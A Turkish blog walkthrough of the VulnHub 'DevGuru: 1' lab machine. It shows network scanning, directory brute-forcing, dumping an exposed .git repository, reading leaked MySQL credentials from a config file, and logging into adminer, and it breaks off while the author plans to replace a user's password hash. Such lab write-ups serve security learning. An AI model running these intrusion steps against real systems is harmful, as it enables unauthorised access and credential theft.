{"id":1277,"date":"2021-06-29T23:55:04","date_gmt":"2021-06-29T23:55:04","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1277"},"modified":"2021-06-29T23:55:04","modified_gmt":"2021-06-29T23:55:04","slug":"devguru-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/29\/devguru-1\/","title":{"rendered":"DEVGURU: 1"},"content":{"rendered":"

Makine Hakk\u0131nda Bilgiler<\/h2>\n

A\u00e7\u0131klama:<\/strong>
\nDevGuru is a fictional web development company hiring you for a pentest assessment. You have been tasked with finding vulnerabilities on their corporate website and obtaining root.<\/p>\n

OSCP like ~ Real life based<\/p>\n

Difficulty: Intermediate (Depends on experience)<\/p>\n

Vulnhub Sayfas\u0131:<\/strong>
\nhttps:\/\/www.vulnhub.com\/entry\/devguru-1,620\/<\/a><\/p>\n

\u0130ndirme Sayfas\u0131:<\/strong>
\nhttps:\/\/download.vulnhub.com\/devguru\/devguru.ova.7z<\/a><\/p>\n

Walkthrough<\/h2>\n

Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n

\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# ifconfig eth0                                                                                                                                                                         1 \u2a2f\neth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\n        inet 10.0.2.17  netmask 255.255.255.0  broadcast 10.0.2.255\n        inet6 fe80::a00:27ff:fe8b:5efb  prefixlen 64  scopeid 0x20<link>\n        ether 08:00:27:8b:5e:fb  txqueuelen 1000  (Ethernet)\n        RX packets 2  bytes 650 (650.0 B)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 13  bytes 1266 (1.2 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# \n\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# arp-scan -l\nInterface: eth0, type: EN10MB, MAC: 08:00:27:8b:5e:fb, IPv4: 10.0.2.17\nStarting arp-scan 1.9.7 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n10.0.2.3    08:00:27:d6:41:76   PCS Systemtechnik GmbH\n10.0.2.18   08:00:27:6a:c8:77   PCS Systemtechnik GmbH\n\n2 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.9.7: 256 hosts scanned in 2.206 seconds (116.05 hosts\/sec). 2 responded\n<\/code><\/pre>\n
Not:<\/strong> Makine bir ara \u00e7\u00f6kt\u00fc bundan dolay\u0131 yeniden y\u00fcklemem gerekti, \u00e7\u00f6z\u00fcm\u00fcn ilerleyen k\u0131s\u0131mlar\u0131nda 10.0.2.18 ip'si yerine 10.0.2.19 ip'si ile devam etmektedir. \u0130kiside ayn\u0131 hedef makinad\u0131r.<\/p>\n
nmap taramas\u0131 ile devam edelim.<\/p>\n
[*] Scan: 228\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-06-29 19:04 EDT\nNmap scan report for devguru.local (10.0.2.19)\nHost is up (0.00070s latency).\nNot shown: 65531 closed ports\nPORT     STATE SERVICE          VERSION\n22\/tcp   open  ssh              OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)\n|   256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)\n|_  256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)\n80\/tcp   open  http             Apache httpd 2.4.29 ((Ubuntu))\n| http-git: \n|   10.0.2.19:80\/.git\/\n|     Git repository found!\n|     Repository description: Unnamed repository; edit this file 'description' to name the...\n|     Last commit message: first commit \n|     Remotes:\n|       http:\/\/devguru.local:8585\/frank\/devguru-website.git\n|_    Project type: PHP application (guessed from .gitignore)\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Exception\n8081\/tcp open  blackice-icecap?\n| fingerprint-strings: \n|   FourOhFourRequest, GetRequest, HTTPOptions: \n|     HTTP\/1.0 404 Not Found\n|     Date: Wed, 30 Jun 2021 02:04:14 GMT\n|     Content-Length: 19\n|     Content-Type: text\/plain; charset=utf-8\n|     404: Page Not Found\n|   GenericLines, Help, Kerberos, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WWWOFFLEctrlstat: \n|     HTTP\/1.1 400 Bad Request\n|     Content-Type: text\/plain; charset=utf-8\n|     Connection: close\n|_    Request\n8585\/tcp open  unknown\n| fingerprint-strings: \n|   GenericLines: \n|     HTTP\/1.1 400 Bad Request\n|     Content-Type: text\/plain; charset=utf-8\n|     Connection: close\n|     Request\n|   GetRequest: \n|     HTTP\/1.0 200 OK\n|     Content-Type: text\/html; charset=UTF-8\n|     Set-Cookie: lang=en-US; Path=\/; Max-Age=2147483647\n|     Set-Cookie: i_like_gitea=10b87eb50e13d5d3; Path=\/; HttpOnly\n|     Set-Cookie: _csrf=3HqcWHr72cPJbOdSVzVAX9ZRSNY6MTYyNTAxODY1NDA2OTE1NTU3Nw; Path=\/; Expires=Thu, 01 Jul 2021 02:04:14 GMT; HttpOnly\n|     X-Frame-Options: SAMEORIGIN\n|     Date: Wed, 30 Jun 2021 02:04:14 GMT\n|     <!DOCTYPE html>\n|     <html lang="en-US" class="theme-">\n|     <head data-suburl="">\n|     <meta charset="utf-8">\n|     <meta name="viewport" content="width=device-width, initial-scale=1">\n|     <meta http-equiv="x-ua-compatible" content="ie=edge">\n|     <title> Gitea: Git with a cup of tea <\/title>\n|     <link rel="manifest" href="\/manifest.json" crossorigin="use-credentials">\n|     <meta name="theme-color" content="#6cc644">\n|     <meta name="author" content="Gitea - Git with a cup of tea" \/>\n|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless\n|   HTTPOptions: \n|     HTTP\/1.0 404 Not Found\n|     Content-Type: text\/html; charset=UTF-8\n|     Set-Cookie: lang=en-US; Path=\/; Max-Age=2147483647\n|     Set-Cookie: i_like_gitea=b0895182a67ffeee; Path=\/; HttpOnly\n|     Set-Cookie: _csrf=wwDFu2OKBCtU3aM4lw9EU41iAmE6MTYyNTAxODY1NDA5MjczNzA4OQ; Path=\/; Expires=Thu, 01 Jul 2021 02:04:14 GMT; HttpOnly\n|     X-Frame-Options: SAMEORIGIN\n|     Date: Wed, 30 Jun 2021 02:04:14 GMT\n|     <!DOCTYPE html>\n|     <html lang="en-US" class="theme-">\n|     <head data-suburl="">\n|     <meta charset="utf-8">\n|     <meta name="viewport" content="width=device-width, initial-scale=1">\n|     <meta http-equiv="x-ua-compatible" content="ie=edge">\n|     <title>Page Not Found - Gitea: Git with a cup of tea <\/title>\n|     <link rel="manifest" href="\/manifest.json" crossorigin="use-credentials">\n|     <meta name="theme-color" content="#6cc644">\n|     <meta name="author" content="Gitea - Git with a cup of tea" \/>\n|_    <meta name="description" content="Gitea (Git with a c\n2 services unrecognized despite returning data. If you know the service\/version, please submit the following fingerprints at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\n==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============\nSF-Port8081-TCP:V=7.91%I=7%D=6\/29%Time=60DBA6EF%P=x86_64-pc-linux-gnu%r(Ge\nSF:tRequest,8F,"HTTP\/1\\.0\\x20404\\x20Not\\x20Found\\r\\nDate:\\x20Wed,\\x2030\\x2\nSF:0Jun\\x202021\\x2002:04:14\\x20GMT\\r\\nContent-Length:\\x2019\\r\\nContent-Typ\nSF:e:\\x20text\/plain;\\x20charset=utf-8\\r\\n\\r\\n404:\\x20Page\\x20Not\\x20Found"\nSF:)%r(FourOhFourRequest,8F,"HTTP\/1\\.0\\x20404\\x20Not\\x20Found\\r\\nDate:\\x20\nSF:Wed,\\x2030\\x20Jun\\x202021\\x2002:04:14\\x20GMT\\r\\nContent-Length:\\x2019\\r\nSF:\\nContent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\n\\r\\n404:\\x20Page\\x20\nSF:Not\\x20Found")%r(SIPOptions,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nC\nSF:ontent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\\nSF:n\\r\\n400\\x20Bad\\x20Request")%r(WWWOFFLEctrlstat,67,"HTTP\/1\\.1\\x20400\\x2\nSF:0Bad\\x20Request\\r\\nContent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nCon\nSF:nection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(GenericLines,67,"HTT\nSF:P\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text\/plain;\\x20char\nSF:set=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(HTTP\nSF:Options,8F,"HTTP\/1\\.0\\x20404\\x20Not\\x20Found\\r\\nDate:\\x20Wed,\\x2030\\x20\nSF:Jun\\x202021\\x2002:04:14\\x20GMT\\r\\nContent-Length:\\x2019\\r\\nContent-Type\nSF::\\x20text\/plain;\\x20charset=utf-8\\r\\n\\r\\n404:\\x20Page\\x20Not\\x20Found")\nSF:%r(RTSPRequest,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\\nSF:x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20B\nSF:ad\\x20Request")%r(Help,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nConten\nSF:t-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n\nSF:400\\x20Bad\\x20Request")%r(SSLSessionReq,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20\nSF:Request\\r\\nContent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\nSF:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(TerminalServerCookie,67,"HTT\nSF:P\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text\/plain;\\x20char\nSF:set=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(TLSS\nSF:essionReq,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20te\nSF:xt\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x2\nSF:0Request")%r(Kerberos,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent\nSF:-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n4\nSF:00\\x20Bad\\x20Request");\n==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============\nSF-Port8585-TCP:V=7.91%I=7%D=6\/29%Time=60DBA6EF%P=x86_64-pc-linux-gnu%r(Ge\nSF:nericLines,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20t\nSF:ext\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x\nSF:20Request")%r(GetRequest,2A00,"HTTP\/1\\.0\\x20200\\x20OK\\r\\nContent-Type:\\\nSF:x20text\/html;\\x20charset=UTF-8\\r\\nSet-Cookie:\\x20lang=en-US;\\x20Path=\/;\nSF:\\x20Max-Age=2147483647\\r\\nSet-Cookie:\\x20i_like_gitea=10b87eb50e13d5d3;\nSF:\\x20Path=\/;\\x20HttpOnly\\r\\nSet-Cookie:\\x20_csrf=3HqcWHr72cPJbOdSVzVAX9Z\nSF:RSNY6MTYyNTAxODY1NDA2OTE1NTU3Nw;\\x20Path=\/;\\x20Expires=Thu,\\x2001\\x20Ju\nSF:l\\x202021\\x2002:04:14\\x20GMT;\\x20HttpOnly\\r\\nX-Frame-Options:\\x20SAMEOR\nSF:IGIN\\r\\nDate:\\x20Wed,\\x2030\\x20Jun\\x202021\\x2002:04:14\\x20GMT\\r\\n\\r\\n<!\nSF:DOCTYPE\\x20html>\\n<html\\x20lang=\\"en-US\\"\\x20class=\\"theme-\\">\\n<head\\x\nSF:20data-suburl=\\"\\">\\n\\t<meta\\x20charset=\\"utf-8\\">\\n\\t<meta\\x20name=\\"v\nSF:iewport\\"\\x20content=\\"width=device-width,\\x20initial-scale=1\\">\\n\\t<me\nSF:ta\\x20http-equiv=\\"x-ua-compatible\\"\\x20content=\\"ie=edge\\">\\n\\t<title>\nSF:\\x20Gitea:\\x20Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\x20<\/title>\\n\\t<link\nSF:\\x20rel=\\"manifest\\"\\x20href=\\"\/manifest\\.json\\"\\x20crossorigin=\\"use-c\nSF:redentials\\">\\n\\t<meta\\x20name=\\"theme-color\\"\\x20content=\\"#6cc644\\">\\\nSF:n\\t<meta\\x20name=\\"author\\"\\x20content=\\"Gitea\\x20-\\x20Git\\x20with\\x20a\nSF:\\x20cup\\x20of\\x20tea\\"\\x20\/>\\n\\t<meta\\x20name=\\"description\\"\\x20conten\nSF:t=\\"Gitea\\x20\\(Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\)\\x20is\\x20a\\x20pai\nSF:nless")%r(HTTPOptions,212A,"HTTP\/1\\.0\\x20404\\x20Not\\x20Found\\r\\nContent\nSF:-Type:\\x20text\/html;\\x20charset=UTF-8\\r\\nSet-Cookie:\\x20lang=en-US;\\x20\nSF:Path=\/;\\x20Max-Age=2147483647\\r\\nSet-Cookie:\\x20i_like_gitea=b0895182a6\nSF:7ffeee;\\x20Path=\/;\\x20HttpOnly\\r\\nSet-Cookie:\\x20_csrf=wwDFu2OKBCtU3aM4\nSF:lw9EU41iAmE6MTYyNTAxODY1NDA5MjczNzA4OQ;\\x20Path=\/;\\x20Expires=Thu,\\x200\nSF:1\\x20Jul\\x202021\\x2002:04:14\\x20GMT;\\x20HttpOnly\\r\\nX-Frame-Options:\\x2\nSF:0SAMEORIGIN\\r\\nDate:\\x20Wed,\\x2030\\x20Jun\\x202021\\x2002:04:14\\x20GMT\\r\\\nSF:n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"en-US\\"\\x20class=\\"theme-\\">\\n\nSF:<head\\x20data-suburl=\\"\\">\\n\\t<meta\\x20charset=\\"utf-8\\">\\n\\t<meta\\x20n\nSF:ame=\\"viewport\\"\\x20content=\\"width=device-width,\\x20initial-scale=1\\">\nSF:\\n\\t<meta\\x20http-equiv=\\"x-ua-compatible\\"\\x20content=\\"ie=edge\\">\\n\\t\nSF:<title>Page\\x20Not\\x20Found\\x20-\\x20\\x20Gitea:\\x20Git\\x20with\\x20a\\x20c\nSF:up\\x20of\\x20tea\\x20<\/title>\\n\\t<link\\x20rel=\\"manifest\\"\\x20href=\\"\/man\nSF:ifest\\.json\\"\\x20crossorigin=\\"use-credentials\\">\\n\\t<meta\\x20name=\\"th\nSF:eme-color\\"\\x20content=\\"#6cc644\\">\\n\\t<meta\\x20name=\\"author\\"\\x20cont\nSF:ent=\\"Gitea\\x20-\\x20Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\"\\x20\/>\\n\\t<me\nSF:ta\\x20name=\\"description\\"\\x20content=\\"Gitea\\x20\\(Git\\x20with\\x20a\\x20\nSF:c");\nMAC Address: 08:00:27:03:DB:0D (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.6\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.70 ms devguru.local (10.0.2.19)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 91.86 seconds\n<\/code><\/pre>\n
Not:<\/strong> Makineyi \u00e7\u00f6zd\u00fckten sonra yazd\u0131\u011f\u0131mdan dolay\u0131 bu nmap taramas\u0131ndaki 8081 portu sizde \u00e7\u0131kmayacakt\u0131r. Makineye ba\u011fland\u0131ktan sonra localdeki bir portu d\u0131\u015far\u0131ya 8081 olarak a\u00e7t\u0131m. (i\u015fimede yaramad\u0131!)<\/p>\n
2 adet web sunucumuz var. Nmap \u00e7\u0131kt\u0131s\u0131nda git buldu\u011funu s\u00f6yl\u00fcyor. Bu ilgin\u00e7 olabilir. gobuster taramalar\u0131n\u0131 ba\u015flatt\u0131ktan sonra git k\u0131sm\u0131na odakland\u0131m.<\/p>\n
\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# gobuster dir --url http:\/\/10.0.2.18:8585\/  --follow-redirect --status-codes-blacklist "404" --no-error --threads 50 --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,sql,zip,bak,sql,txt,php5,py,rar,7z,log --expanded  --add-slash\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.0.2.18:8585\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              html,zip,py,log,php5,rar,7z,php,sql,bak,txt\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/06\/29 14:28:07 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.0.2.18:8585\/admin\/               (Status: 200) [Size: 9604]\nhttp:\/\/10.0.2.18:8585\/issues\/              (Status: 200) [Size: 9604]\nhttp:\/\/10.0.2.18:8585\/explore\/             (Status: 200) [Size: 10521]\nhttp:\/\/10.0.2.18:8585\/debug\/               (Status: 200) [Size: 160]  \nhttp:\/\/10.0.2.18:8585\/milestones\/          (Status: 200) [Size: 9605] \nhttp:\/\/10.0.2.18:8585\/notifications\/       (Status: 200) [Size: 9604] \nhttp:\/\/10.0.2.18:8585\/frank\/               (Status: 200) [Size: 11329]\nhttp:\/\/10.0.2.18:8585\/Frank\/               (Status: 200) [Size: 11329]\nhttp:\/\/10.0.2.18:8585\/healthcheck\/         (Status: 200) [Size: 26]   \n\n===============================================================\n2021\/06\/29 15:59:10 Finished\n===============================================================\n<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# gobuster dir --url http:\/\/10.0.2.18\/  --follow-redirect --status-codes-blacklist "404" --no-error --threads 50 --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,sql,zip,bak,sql,txt,php5,py,rar,7z,log --expanded  --add-slash\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.0.2.18\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              rar,html,sql,zip,txt,7z,log,php,bak,php5,py\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/06\/29 14:30:36 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.0.2.18\/index.php            (Status: 200) [Size: 12699]\nhttp:\/\/10.0.2.18\/about\/               (Status: 200) [Size: 18641]\nhttp:\/\/10.0.2.18\/icons\/               (Status: 403) [Size: 274]  \nhttp:\/\/10.0.2.18\/services\/            (Status: 200) [Size: 10008]\nhttp:\/\/10.0.2.18\/0\/                   (Status: 200) [Size: 12649]\nhttp:\/\/10.0.2.18\/server.php           (Status: 200) [Size: 0]    \nhttp:\/\/10.0.2.18\/About\/               (Status: 200) [Size: 18641]\nhttp:\/\/10.0.2.18\/backend\/             (Status: 200) [Size: 6220] \nhttp:\/\/10.0.2.18\/Services\/            (Status: 200) [Size: 10008]\nProgress: 311880 \/ 2646792 (11.78%)                             ^C\n[!] Keyboard interrupt detected, terminating.\n\n===============================================================\n2021\/06\/29 16:22:44 Finished\n===============================================================\n<\/code><\/pre>\n
8585'te \u00e7al\u0131\u015fan bir gitea isimli proje var. San\u0131r\u0131m bir git projesine odaklanaca\u011f\u0131z. 8585 ise bunun kontrol\u00fc i\u00e7in bir web aray\u00fcz\u00fc olabilir. 8585'te gezerken bir kullan\u0131c\u0131 hesab\u0131 g\u00f6rd\u00fcm ve sayfas\u0131na gitti\u011fimde 3 adet commitinide g\u00f6rd\u00fcm. Ancak giri\u015f yapamad\u0131\u011f\u0131m\u0131z i\u00e7in commit'leri tabikide g\u00f6remiyorum. Makine sanki bu kullan\u0131c\u0131ya giri\u015f yapmaya beni zorlayacak gibi. Bunun i\u00e7in bir hydra ile sald\u0131r\u0131 ba\u015flatt\u0131m. Rockyou'yu verdim ancak k\u0131ramad\u0131.<\/p>\n
80'deki site nedendir bilmiyorum \u00e7ok yava\u015f \u00e7al\u0131\u015f\u0131yor. git_dumper<\/strong> ile projeyi almaya ba\u015flad\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/git-dumper\/devguru]\n\u2514\u2500# .\/git_dumper.py http:\/\/10.0.2.18\/.git devguru -t 60\n\n...\n...\n\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/8f\/dbdd801182d71e58cdb343a9346dbb9e748b0a [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/57\/64f248d83c1a762d62826e6f7f4b4c1d3be5a8 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/3d\/b6373b1ae15d1fb17d4cff7d917fa80fd5f6c8 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/bf\/e30338ca328da9952d76c0f4a0f3df324bae2a [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/ea\/20d8617d83062042bfc0258525cd5d0da4cc52 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/19\/7c50c3c5aa0266d1fa828b830772d849d2c410 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/c2\/27144421d6829a9f0e79eee3692106befa9f0a [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/a5\/a17286a54f54fa8bd0100755849810556abe20 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/19\/4fa3c5f965e20699c0b5a83158728981b413f4 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/3d\/e2cb7b27fb4d8e4ebf6781e7980a0d9b9b4e77 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/d5\/0c8eefeb9ca5a119fb47a255703b3f12fd268e [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/20\/315b9619d9abbae7ed97334ea3cb21f57de13f [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/c2\/58ff5106d2c6dfbee4a6994adb44b6381c0727 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/1c\/6c20e08663409383e3cca053901a490bb3ff6c [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/0e\/c10b1cc6509f1a8830caa099777cdb5238c8bb [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/f4\/97215bddc1c889d6cb7afed19c0110d208cb62 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/98\/44b753317ac6d45e3f6a5196f0d32b5d1a1307 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/8e\/e843060aeeb85724a4f7e8dbc6f3bd46191deb [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/02\/8619a885bf8c4cf22449503f7adcc2f0c2ace3 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/a2\/c407f8e3ab2606568c55727b451a6c583a3989 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/18\/40f6556fcb958cb2ae424da1bb5de3f740d491 [200]\n[-] Fetching http:\/\/10.0.2.18\/.git\/objects\/67\/1701188cacf7680a281380f983f5243112f86f [200]\n[-] Running git checkout .\n<\/code><\/pre>\n
\u0130\u00e7inde gezindikten sonra bir mysql connection string yakalad\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/git-dumper\/devguru\/config]\n\u2514\u2500# cat database.php \n<?php\n\nreturn [\n\n    \/*\n    |--------------------------------------------------------------------------\n    | PDO Fetch Style\n    |--------------------------------------------------------------------------\n    |\n    | By default, database results will be returned as instances of the PHP\n    | stdClass object; however, you may desire to retrieve records in an\n    | array format for simplicity. Here you can tweak the fetch style.\n    |\n    *\/\n\n    'fetch' => PDO::FETCH_CLASS,\n\n    \/*\n    |--------------------------------------------------------------------------\n    | Default Database Connection Name\n    |--------------------------------------------------------------------------\n    |\n    | Here you may specify which of the database connections below you wish\n    | to use as your default connection for all database work. Of course\n    | you may use many connections at once using the Database library.\n    |\n    *\/\n\n    'default' => 'mysql',\n\n    \/*\n    |--------------------------------------------------------------------------\n    | Database Connections\n    |--------------------------------------------------------------------------\n    |\n    | Here are each of the database connections setup for your application.\n    | Of course, examples of configuring each database platform that is\n    | supported by Laravel is shown below to make development simple.\n    |\n    |\n    | All database work in Laravel is done through the PHP PDO facilities\n    | so make sure you have the driver for your particular database of\n    | choice installed on your machine before you begin development.\n    |\n    *\/\n\n    'connections' => [\n\n        'sqlite' => [\n            'driver'   => 'sqlite',\n            'database' => 'storage\/database.sqlite',\n            'prefix'   => '',\n        ],\n\n        'mysql' => [\n            'driver'     => 'mysql',\n            'engine'     => 'InnoDB',\n            'host'       => 'localhost',\n            'port'       => 3306,\n            'database'   => 'octoberdb',\n            'username'   => 'october',\n            'password'   => 'SQ66EBYx4GT3byXH',\n            'charset'    => 'utf8mb4',\n            'collation'  => 'utf8mb4_unicode_ci',\n            'prefix'     => '',\n            'varcharmax' => 191,\n        ],\n<\/code><\/pre>\n
Elimizde bir adet kullan\u0131c\u0131 hesab\u0131 var.<\/p>\n
october:SQ66EBYx4GT3byXH<\/code><\/pre>\n
\u0130\u00e7eride mysql'in \u00e7al\u0131\u015ft\u0131\u011f\u0131 belli ve gobuster'\u0131n bulamad\u0131\u011f\u0131 ancak git projesinin i\u00e7inde buldu\u011fum http:\/\/10.0.2.18\/adminer.php<\/a><\/strong> adresine gitti\u011fimizde bizi phpmyadmin vari bir sayfa kar\u015f\u0131l\u0131yor. Bu sayfaya elde etti\u011fim kullan\u0131c\u0131larla giri\u015f yapt\u0131m.<\/p>\n
\u2500\u2500(root💀kali)-[~\/git-dumper\/devguru]\n\u2514\u2500# ls -al\ntotal 476\ndrwxr-xr-x 10 root root   4096 Jun 29 18:46 .\ndrwxr-xr-x  5 root root   4096 Jun 29 18:18 ..\n-rw-r--r--  1 root root 362514 Jun 29 15:34 adminer.php\n-rw-r--r--  1 root root  56688 Jun 29  2021 app.ini.bak\n-rw-r--r--  1 root root   1640 Jun 29 15:34 artisan\ndrwxr-xr-x  2 root root   4096 Jun 29 15:34 bootstrap\ndrwxr-xr-x  2 root root   4096 Jun 29 15:34 config\ndrwxr-xr-x  9 root root   4096 Jun 29 18:46 devguru-website\ndrwxr-xr-x  7 root root   4096 Jun 29 15:57 .git\n-rw-r--r--  1 root root    413 Jun 29 15:34 .gitignore\n-rw-r--r--  1 root root   1678 Jun 29 15:34 .htaccess\n-rw-r--r--  1 root root   1173 Jun 29 15:34 index.php\ndrwxr-xr-x  5 root root   4096 Jun 29 15:34 modules\ndrwxr-xr-x  3 root root   4096 Jun 29 15:34 plugins\n-rw-r--r--  1 root root   1518 Jun 29 15:34 README.md\n-rw-r--r--  1 root root    551 Jun 29 15:34 server.php\ndrwxr-xr-x  6 root root   4096 Jun 29 15:34 storage\ndrwxr-xr-x  4 root root   4096 Jun 29 15:34 themes\n<\/code><\/pre>\n
Elde etti\u011fim kullan\u0131c\u0131yla giri\u015f yapt\u0131m.<\/p>\n
Not:<\/strong> Anlat\u0131mlar\u0131mda foto\u011fraf kullanmad\u0131\u011f\u0131m i\u00e7in a\u00e7\u0131klamalar\u0131m\u0131 dikkatli okuman\u0131z\u0131 tavsiye ediyorum. \u00c7\u00fcnk\u00fc i\u015fler biraz kar\u0131\u015facak...<\/p>\n
\u0130\u00e7eri girdi\u011fimde octaberdb<\/strong>'yi g\u00f6rd\u00fcm. Burdan hemen db'nin i\u00e7ine girip users ile ba\u015flayan tablo arad\u0131m. backend_users<\/strong> tablosunu buldum. Ancak parolalar hashlenmi\u015fti. Frank kullan\u0131c\u0131s\u0131n\u0131n hash'ini ald\u0131m ve internette arad\u0131m. K\u0131ramad\u0131m ancak format\u0131n\u0131 buldum. https:\/\/www.tunnelsup.com\/hash-analyzer\/<\/a> adresinden $2y$10$bp5wBfbAN6lMYT27pJMomOGutDF2RKZKYZITAupZ3x8eAaYgN6EKK<\/strong> hash'ini sorgulad\u0131\u011f\u0131n\u0131zda size bcrypt<\/strong> format\u0131nda oldu\u011funu s\u00f6yl\u00fcyor. Bende kendim bir bcrypt<\/strong> format\u0131nda hash \u00fcretip, kullan\u0131c\u0131n\u0131n parolas\u0131 ile de\u011fi\u015ftirmeye karar verdim.  https:\/\/www.browserling.com\/tools\/bcrypt<\/a> adresinden kuday de\u011ferina sahip round'u 10 olan bir hash \u00fcrettim.<\/p>\n
